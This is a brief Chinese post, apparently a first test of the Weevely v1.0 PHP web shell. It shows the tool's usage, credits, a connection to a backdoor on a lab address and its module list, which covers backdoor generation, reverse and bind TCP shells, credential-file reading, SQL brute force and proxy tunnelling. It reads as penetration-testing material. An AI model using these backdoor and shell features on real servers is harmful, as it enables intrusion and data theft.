Weevely 出现已经有一段时间了, 今天测试一下. 有点类似中国菜刀. 不同的是: 后门加密, 仅支持PHP后门相关.
root@gnu:~# weevely
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Start ssh-like terminal session
weevely <url> <password>
[+] Run command directly from command line
weevely <url> <password> [ "<command> .." | :<module> .. ]
[+] Generate PHP backdoor
weevely generate <password> [ <path> ] ..
[+] Show credits
weevely credits
[+] Show available module and backdoor generators
weevely help
核心功能有三个: 1. 生成后门, 2.连接后门执行命令(交互式操作), 3.连接后门执行命令(非交互式)
root@gnu:~# weevely credits
Website
http://epinna.github.com/Weevely/
Author
Emilio Pinna
http://disse.cting.org
Contributors
Andrea Cardaci
http://cyrus-and.github.com/
Raffaele Forte, Backbox Linux
http://www.backbox.org
Simone Margaritelli
http://www.evilsocket.net/
root@gnu:~# weevely http://192.168.2.111/weevely.php password
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.
root@gnu:/var/www $ :help
+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess. |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+-----------------------------------------------------------------------+
| module | description |
+----------------------+-----------------------------------------------------------------------+
| :audit.mapwebfiles | Enumerate webroot files properties |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :audit.userfiles | Enumerate common users restricted files |
| :shell.sh | System shell |
| :shell.php | PHP shell |
| :system.info | Collect system informations |
| :find.suidsgid | Find files with superuser flags |
| :find.perms | Find files with write, read, execute permissions |
| :backdoor.tcp | Open a shell on TCP port |
| :backdoor.reversetcp | Send reverse TCP shell |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :bruteforce.sql | Bruteforce SQL username |
| :file.upload2web | Upload binary/ascii file into web folders and guess corresponding url |
| :file.download | Download binary/ascii files from target filesystem |
| :file.read | Read files from target filesystem |
| :file.enum | Check remote files type, md5 and permission |
| :file.upload | Upload binary/ascii file to the target filesystem |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :sql.console | Execute SQL queries |
| :sql.dump | Get SQL database dump |
| :net.scan | Print interface addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.ifaces | Print interface addresses |
| :net.phpproxy | Install remote PHP proxy |
+----------------------+-----------------------------------------------------------------------+